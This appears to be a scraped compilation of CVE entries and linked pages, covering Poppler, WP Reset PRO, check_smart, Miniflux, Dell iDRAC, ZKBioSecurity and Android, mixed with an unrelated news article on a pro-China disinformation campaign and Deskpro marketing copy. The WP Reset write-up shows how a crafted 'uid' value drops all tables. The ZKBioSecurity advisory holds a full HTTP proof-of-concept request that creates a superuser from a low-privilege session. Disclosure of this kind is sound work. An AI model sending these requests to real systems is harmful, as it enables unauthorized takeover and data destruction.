An issue was discovered in Poppler 22.07.0. There is a reachable abort which leads to denial of service because the main function in pdfunite.cc lacks a stream check before saving an embedded file.

When testing #706 (closed), we found the bug is not completely patched in pdfunite. To reproduce the bug, run pdfunite t.pdf poc 2.pdf.

    (gdb) bt
    #0  0x00007ffff72467bb in raise () from /lib/x86_64-linux-gnu/libc.so.6
    #1  0x00007ffff7231535 in abort () from /lib/x86_64-linux-gnu/libc.so.6
    #2  0x000000000040d7a1 in Object::getDict (this=<optimized out>)
        at /home/users/chluo/poppler/poppler/Object.h:435
    #3  main (argc=<optimized out>, argv=<optimized out>)
        at /home/users/chluo/poppler/utils/pdfunite.cc:200

uni.zip

Edited Jul 28, 2022 by

CVE-2022-37051: SIGABRT at poppler/Object.h:435 (pdfunite) (#1276) · Issues · poppler / poppler · GitLab

Cross-Site Request Forgery (CSRF) vulnerability in WebFactory Ltd. WP Reset PRO plugin <= 5.98 versions.

_There was a critical security vulnerability in the WP Reset PRO plugin which allowed any authenticated user to wipe the database._

**Do you want to be the first to be alerted about such vulnerabilities? Sign up for Patchstack Community (Free) plan and monitor up to 99 websites for free.**

**For plugin developers, we have security audit services and Threat Intelligence Feed API for hosting companies.**

The PRO version of the WP Reset plugin (versions 5.98 and below) suffers from a vulnerability that allows any authenticated user, regardless of their authorization, to wipe the entire database.

Because it wipes all tables in the database, it will restart the WordPress installation process which could allow an attacker to launch this installation process and then create an administrator account at the end of this process as by default an administrator account has to be created once the WordPress site has been installed.

After this, they could further exploit the site by uploading a malicious plugin or uploading a backdoor.

The plugin is described as a plugin that helps you to quickly reset the site’s database to the default installation values without modifying any files. It deletes all customizations and content or just chosen parts like theme settings.

The described issue was fixed in version 5.99 after a rapid response (within 24 hours!) by the developer team of the plugin in question.

**The security vulnerability in WP Reset PRO plugin**

The issue in this plugin is caused due to a lack of authorization and nonce token check. The plugin registers a few actions in the _admin\_action\_\*_ scope. In the case of this vulnerability, it’s _admin\_action\_wpr\_delete\_snapshot\_tables_.

Unfortunately, the _admin\_action\_\*_ scope does not perform a check to determine if the user is authorized to perform said action, nor does it validate or check a nonce token to prevent CSRF attacks.

This action is registered as follows:

    add_action('admin_action_wpr_delete_snapshot_tables', array($this, 'delete_snapshot_tables'));

The function delete\_snapshot\_tables looks like the following:

    function delete_snapshot_tables($uid = '')
    {
        global $wpdb;
    
        if (empty($uid)) {
            $uid = $_GET['uid'];
        }
    
        if (strlen($uid) != 4 && strlen($uid) != 6) {
            return new WP_Error(1, 'Invalid UID format.');
        }
    
        $tables = $wpdb->get_col($y = $wpdb->prepare('SHOW TABLES LIKE %s', array($uid . '\_%')));
        foreach ($tables as $table) {
            $wpdb->query('DROP TABLE IF EXISTS `' . $table . '`');
            if ($wpdb->last_error !== '') {
                $this->log('error', 'Failed to delete table ' . $table . ': ' . $wpdb->last_error);
            } else {
                $this->log('info', 'Deleted table ' . $table);
            }
        }
    
        if (!empty($_GET['redirect'])) {
            wp_safe_redirect($_GET['redirect']);
        }
    
        return true;
    }

  
It can be seen that the _uid_ query parameter is grabbed from the URL, which is directly used as a prefix of the tables that should be deleted. Since the LIKE operator is used, we can pass a query parameter such as _%%wp_ to delete all tables with the prefix wp.

Once this is done, someone could simply visit the homepage of the site to start the WordPress installation process.

**The patch in WP Reset PRO**

Since this is a premium plugin, the patch cannot be seen at the WordPress.org SVN repository.

Based on our own research and communication with the development team of the WP Reset PRO plugin, we can confirm that an authentication and authorization check has been added using the current\_user\_can function, along with a check to determine if a valid nonce token is present in the request using the check\_admin\_referer function.

In addition to this, the _uid_ query parameter is also checked and made sure that it’s a string only containing letters using the ctype\_alpha function.

**Timeline**

**27-09-2021** – We discovered the vulnerability in WP Reset PRO and released a virtual patch to all Patchstack paid version customers.  
******27-09-2021****** – We reached out to the developer of the plugin.  
******28-09-2021****** – The developer replied and we provided the vulnerability information.  
******28-09-2021****** – The developer released a new plugin version, 5.99, which fixes this issue.  
******10-11-2021****** – Published the article.  
**10-11-2021** – Added the vulnerability to the Patchstack vulnerability database.

Websites with Patchstack paid version are protected from the issue and have received a virtual patch.

CVE-2021-36908: Critical Security Vulnerability Fixed In WP Reset PRO - Patchstack

check_smart before 6.9.1 allows unintended drive access by an unprivileged user because it only checks for a substring match of a device path (the /dev/bus substring and a number), aka an unanchored regular expression.

CVE-2021-42257: ck :: monitoring nagios plugin check_smart SMART Hard Drive Solid State Drive NVMe Check

Miniflux is a feed reader. Prior to version 2.0.43, an unauthenticated user can retrieve Prometheus metrics from a publicly reachable Miniflux instance where the `METRICS_COLLECTOR` configuration option is enabled and `METRICS_ALLOWED_NETWORKS` is set to `127.0.0.1/8` (the default). A patch is available in Miniflux 2.0.43. As a workaround, set `METRICS_COLLECTOR` to `false` (default) or run Miniflux behind a trusted reverse-proxy.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-27591: Unauthenticated user can bypass allowed networks check to obtain Prometheus metrics

Dell iDRAC9 version 6.00.02.00 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker could exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.

**Vaikutus**

Low

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34435

Dell iDRAC9 version 6.00.02.00 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker may potentially exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.

2.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

CVE-2022-34436

Dell iDRAC8 version 2.83.83.83 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker may potentially exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.  
 

2.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2022-34435

Dell iDRAC9 version 6.00.02.00 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker may potentially exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.

2.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

CVE-2022-34436

Dell iDRAC8 version 2.83.83.83 and prior contain an improper input validation vulnerability in Racadm when the firmware lock-down configuration is set. A remote high privileged attacker may potentially exploit this vulnerability to bypass the firmware lock-down configuration and perform a firmware update.  
 

2.7

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**CVEs Addressed**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-34435

Dell iDRAC9

Versions before 6.00.30.00

6.00.30.00

https://www.dell.com/support/home/en-us/drivers/driversdetails?driverId=D92HF

CVE-2022-34436

Dell iDRAC8

Versions before 2.84.84.84

2.84.84.84

iDRAC8 firmware is planned to be available March 2023.

**CVEs Addressed**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

CVE-2022-34435

Dell iDRAC9

Versions before 6.00.30.00

6.00.30.00

https://www.dell.com/support/home/en-us/drivers/driversdetails?driverId=D92HF

CVE-2022-34436

Dell iDRAC8

Versions before 2.84.84.84

2.84.84.84

iDRAC8 firmware is planned to be available March 2023.

**Kiitokset**

Dell Technologies would like to thank the Cloud Compute Security Team from Google for reporting this issue.  
 

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2022-11-14

Initial release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

iDRAC8, iDRAC9, iDRAC9 - 3.0x Series, iDRAC9 - 3.1x Series, iDRAC9 - 3.2x Series, iDRAC9 - 3.3x Series, iDRAC9 - 3.4x Series, iDRAC9 - 4.xx Series, iDRAC9 - 5.xx Series, iDRAC9 - 6.xx Series

14 marrask. 2022

CVE-2022-34435: DSA-2022-265: Dell iDRAC8 and Dell iDRAC9 Security Update for a RACADM Vulnerability

The suspected Chinese influence operation had limited success. But it signals a growing threat from a new disinformation adversary.

Since Russia bombarded the 2016 election with Twitter trolls and astroturfed lies, election watchers have been on guard against social media “influence operations.” Four years later, Iran took a stab at meddling in the 2020 presidential election, with more mixed results. Now, the People's Republic of China—or, at least, a group with a long-running pro-Chinese government agenda—seems to be trying out its own political influence operation just ahead of this year's US midterm elections. And while that operation seems to have largely failed this time, the campaign represents the growing boldness of a new adversary in the fight against organized disinformation.

On Wednesday, cybersecurity and threat intelligence firm Mandiant published new findings about a group it calls Dragonbridge, which it's seen for years promoting pro-Chinese interests in fake grassroots social media campaigns designed to influence politics in Taiwan and Hong Kong. Now, Mandiant's analysts have tied Dragonbridge to a series of more US-focused influence campaigns. The group claimed that a notorious hacking spree carried out by known Chinese state-sponsored hackers was actually carried out by US intelligence, falsely blamed the sabotage of the Nord Stream pipeline on the US government, and—perhaps most brazenly—seeded hundreds of posts on social media designed to demoralize voters and reduce turnout ahead of the November midterms.

“This actor has been rapidly growing and hyper-aggressive. They went from carrying out limited campaigns focused on Hong Kong to a global operation on dozens of platforms,” says John Hultquist, Mandiant's VP of intelligence analysis. “Interfering in our elections is just another line that they're clearly willing to cross.”

Mandiant declined to reveal in its report or to WIRED the full collection of disinformation posts that it's tied to Dragonbridge, but the company says the posts numbered in the thousands. Nor would Mandiant name all the platforms where Dragonbridge had created accounts. But it describes posts published by these accounts arguing that American democracy was being taken over by extreme partisanship, as well as posts pointing to episodes of confrontations and violence between political groups and against the FBI as instances of “civil war.” The group also published a video, Mandiant says, that discourages Americans from voting, making claims about political gridlock and inaction and showing images of the January 6, 2021, insurrection at the US Capitol Building. “The solution to America’s ills is not to vote for someone,” the video argues at one point, according to Mandiant, but “to root out this ineffective and incapacitated system.” All of the content Mandiant identified in its report as part of the Dragonbridge operations has since been deleted, the company says.

Other simultaneous influence campaigns from the group tie it more evidently to Chinese government interests. Pseudonymous Twitter accounts that Mandiant says were controlled by Dragonbridge posted claims in both English and Mandarin stating that espionage campaigns carried out by the prolific China-linked hacker group APT41 were really the work of the NSA and CIA. “For at least ten years, the American hacker group \[APT41\] has repeatedly carried out cyber attacks, espionage activities, cyber piracy and cyber crimes against other countries,” reads one tweet in October from a seemingly fictional person named Karen Diaz.

In fact, the US Department of Justice indicted seven Chinese men in 2020 as members of APT41, tying them to a contractor working on behalf of China's Ministry of State Security known as Chengdu 404. The indictment accuses the men of hacking hundreds of targets around the globe, both to carry out espionage on behalf of the MSS and to profit from their own cybercrime operations.

In an attempt to shift that blame, Dragonbridge's influence campaign went so far as to create spoofed posts from Intrusion Truth, a mysterious pseudonymous Twitter account that has previously released evidence tying multiple hacking campaigns to China, including those of APT41. The fake Intrusion Truth posts instead falsely tie APT41 to US hackers. Dragonbridge also created an altered, spoofed version of an article in the Hong Kong news outlet _Sing Tao Daily_ pinning APT41's activities on the US government.

In a more timely example of Dragonbridge's disinformation operations, it also sought to blame the destructive sabotage of the Nord Stream natural gas pipeline—a key piece of infrastructure connecting European countries to Russian gas sources—on the United States. Mandiant says that claim, which echoes statements from Russian president Vladimir Putin and Russian disinformation sources, appears to be part of a larger campaign designed to sow divisions between the United States and its allies that have opposed and sanctioned Russia for its unprovoked and catastrophic military invasion of Ukraine.

None of those campaigns, Mandiant emphasizes, was particularly successful. Most of the posts had single-digit likes, retweets, or comments at best, the company says. Some of its spoofed tweets impersonating Intrusion Truth have no signs of engagement at all. But Hultquist warns nonetheless that Dragonbridge demonstrates a new interest in aggressive disinformation from pro-China sources, and possibly from China itself. He worries, given China's widespread cyber intrusions around the world, that future Chinese disinformation campaigns might include hack-and-leak operations that blend real revelations into disinformation campaigns, as Russia's GRU military intelligence agency has done. “If they get their hands on some real information from a hacking operation,” Hultquist says, “that's where they become especially dangerous.”

Despite Dragonbridge's occasional pro-Russian messages, Hultquist says that Mandiant has little doubt of the group's pro-China focus. The company first spotted Dragonbridge engaged in a fake grassroots campaign to disparage Hong Kong pro-democracy protestors in 2019. Earlier this year, it saw the group pose as Americans protesting against US rare-earth metal mining companies that competed with Chinese firms.

That doesn't mean Dragonbridge's campaigns are necessarily the work of a Chinese government agency or even a contractor firm like Chengdu 404. But they're very likely at least located in China, Hultquist says. “It's hard to imagine their activity, in its totality, being in any other country's interest,” says Hultquist.

If Dragonbridge is working directly for the Chinese government, it may mark a new phase in China's use of disinformation. In the past, China has largely stayed away from influence operations. A Director of National Intelligence report on foreign threats to the 2020 election declassified last year stated that China “considered but did not deploy influence efforts designed to change the outcome of the US Presidential election.” But just last month Facebook, too, says it spotted and removed campaigns of Chinese political disinformation posted to the platform from mid-2021 to September 2022, though it didn't say if the campaigns were linked to Dragonbridge.

Despite the apparent resources put into Dragonbridge's long-running operations, its new foray into election meddling looks remarkably ham-fisted, says Thomas Rid, a professor of strategic studies at Johns Hopkins and author of a history of disinformation, _Active Measures_. He points to abstract phrases, like its call to “root out this ineffective and incapacitated system.” That kind of dull language fails to effectively exploit real wedge issues to exacerbate existing divisions in US society—often best identified by local agents on the ground. “It seems like they didn’t read the manual,” Rid says. “It seems like a remote, amateurish affair done from Beijing.”

But both Rid and Mandiant's Hultquist agree that Dragonbridge's relative lack of success shouldn't be seen as a sign of Americans' growing immunity to influence operations. In fact, they argue that the deep political divisions in American society may mean that the US is less equipped than ever to distinguish fact from fabrication in social media. “Authoritative sources are no longer trusted,” says Hultquist. “I'm not sure that we're in a great place right now, as a country, to digest that some major information operation is attributable to a foreign power.”

A Pro-China Disinfo Campaign Is Targeting US Elections—Badly

ZKSecurity BIO version 3.0.5.0_R suffers from a privilege escalation vulnerability.

#######################ADVISORY INFORMATION#######################

Product: ZKSecurity BIO

Vendor: ZKTeco

Version Affected: 3.0.5.0_R

CVE: CVE-2022-36634

Vulnerability: User privilege escalation

#######################CREDIT#######################

This vulnerability was discovered and researched by Caio Burgardt and  
Silton Santos.

#######################INTRODUCTION#######################

Based on the hybrid biometric technology and computer vision technology,  
ZKBioSecurity provides a comprehensive web-based security platform. It  
contains multiple integrated modules: personnel, time & attendance, access  
control, visitor management, offline & online consumption management, guard  
patrol, parking, elevator control, entrance control, Facekiosk, intelligent  
video management, mask and temperature detection module, and other smart  
sub-systems.

#######################VULNERABILITY DETAILS#######################

The application's access control management does not check the session's  
permissions correctly. An attacker with "Person Self-Login" or "User"  
privilege can create a super user with full privileges in the application

#######################PROOF OF CONCEPT#######################

POST /authUserAction!edit.action HTTP/1.1

Host: {HOST}

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101  
Firefox/102.0

Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data;  
boundary=---------------------------291763244192371568695079347

Content-Length: 1956

Origin: http://{HOST}:8088

Connection: close

Referer: http://{HOST}:8088/base_index.action

Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE>

Upgrade-Insecure-Requests: 1

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.username"

test_privesc

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.loginPwd"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="repassword"

KDla123

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isActive"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.isSuperuser"

true

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="groupIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="deptIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="areaIds"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.email"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.name"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="authUser.lastName"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerTemplate"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="fingerId"

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="logMethod"

add

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="un"

1657813612925_286

-----------------------------291763244192371568695079347

Content-Disposition: form-data; name="systemCode"

base

-----------------------------291763244192371568695079347--

#######################END#######################

ZKSecurity BIO 3.0.5.0_R Privilege Escalation

Server Side Request Forgery vulnerability found in Deskpro Support Desk v2021.21.6 allows attackers to execute arbitrary code via a crafted URL.

**The all-in-one helpdesk software, available on Cloud or On-Premise**

Deliver **memorable** **customer experiences** to your external or internal users with our **flexible and dynamic** helpdesk software.

...or sign up with

**World-leading organizations trust Deskpro**

Meet our customers

> We started using Deskpro to try and structure our support service more, before that we had been using a Gmail shared inbox that was very difficult to structure when you have several users.
> 
> Sarah KippernesHead of Support

> We have 734 new ticket triggers, 850 departments and over 650 unique outgoing email addresses. Once we had set them up, it has saved us countless hours by automating so many of the complexities of routing, mapping and responding.
> 
> Chris EvansVP of IT Operations

> We’re a cutting-edge university, so we want the systems we use to reflect our innovative values.
> 
> Kimberly ByrdDirector of Academic and Computing Support Services

> We looked at all the major players in the industry and none of them could come close to Deskpro in price, functionality, or customer services.
> 
> Brian PolackoffVP of Sales and Customer Relations

Use cases

**Use Deskpro your way**

Deskpro is highly customizable and diverse to easily fit any organization's specific needs and improve communication with their varied end users, whether internal or external.

**The all-in-one support solution you can depend on**

Centralize your customer conversations with a helpdesk that captures every message and stores them in a shared inbox, bringing your team together for harmonious support.

**Workspace switching**

Seamlessly move between workspaces with simple transitions across multiple helpdesks.

**Reply with complete context**

Verify users and instantly get a holistic view of who you’re talking to with our in-built CRM.

**Multi-channel support**

Capture every message across all support touchpoints in your centralized helpdesk.

**Live Chat and Voice**

Give your team more ways to engage so they can resolve problems faster.

**Increase team productivity**

Save time and reduce support costs with automation tools that boost productivity.

**Extend your support with powerful features**

Your team can provide incredible support when armed with the tools to succeed.

**Automations**

We have all the tools your team needs to resolve any issue. Boost efficiency by reducing repetitive tasks through powerful automations.

Learn more

**Reports**

Our built-in and custom stats will help you to make data-driven decisions that improve your team's support.

Learn more

**Customer Satisfaction**

Gather feedback directly from your users, and track your performance to build the support system of your customer’s dreams.

Learn more

**Help Center**

Provide amazing support with 24/7 self-service Help Center software to make finding the answer easier for your customers.

Learn more

**Messenger**

Instantly communicate with customers via fully-integrated live chat with more functionality than leading standalone chat solutions.

Learn more

**Customization**

Create a helpdesk that is entirely your own; with endless customization capabilities, you can develop a platform that fits your business.

Learn more

**Multi-Brand**

Run and support several different brands or departments from the same helpdesk platform, with a collaborative multi-brand helpdesk solution.

Learn more

**Flexible Interface**

Collapse the Ticket properties and CRM Profile on a ticket to give you better visibility and more room to work. And your viewing preferences will be remembered between tickets.

Learn more

**Social Media**

Deskpro's social media integrations with WhatsApp, Twitter, Facebook, and SMS help you communicate seamlessly with your customers on their favorite platforms.

Learn more

**Search**

Powerful searching capabilities make it easy for agents to locate the information they need across the different helpdesk components.

Learn more

**There's an app for that**

Connect the apps you use every day to boost efficiency across your organization. Deskpro offers thousands of bespoke apps and integrates with even more through Zapier.

**Loved by world-leading organizations**

**We’ve been making great helpdesk software for over 20 years**

When you buy Deskpro you’re getting more than just software. We’re here to support you every step of the way, from regular software updates to support, training and advice.

CVE-2021-35391: Deskpro | Helpdesk Software | Cloud or On-Premise

In system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-192535676

CVE-2021-0680: Android Security Bulletin—September 2021  |  Android Open Source Project

In system properties, there is a possible information disclosure due to a missing permission check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android SoCAndroid ID: A-192535337

Search

lenovo warranty check/lookup | check warranty status | lenovo support us